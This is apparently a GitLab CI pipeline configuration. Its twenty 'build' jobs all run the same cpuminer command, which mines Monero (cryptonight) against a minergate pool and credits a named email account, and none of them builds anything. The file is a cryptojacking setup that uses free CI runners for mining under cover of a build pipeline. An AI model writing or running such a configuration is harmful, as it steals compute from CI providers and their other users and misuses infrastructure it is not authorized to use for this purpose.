image: blueskyos/hubgate
 
job1:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job2:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job3:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
    
job4:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job5:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job6:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job7:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job8:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job9:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job10:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job11:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job12:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job13:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job14:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job15:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job16:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job17:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job18:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job19:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
 
job20:
  stage: build
  script: 
    - cpuminer -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u bluesky.os@yandex.com -p x
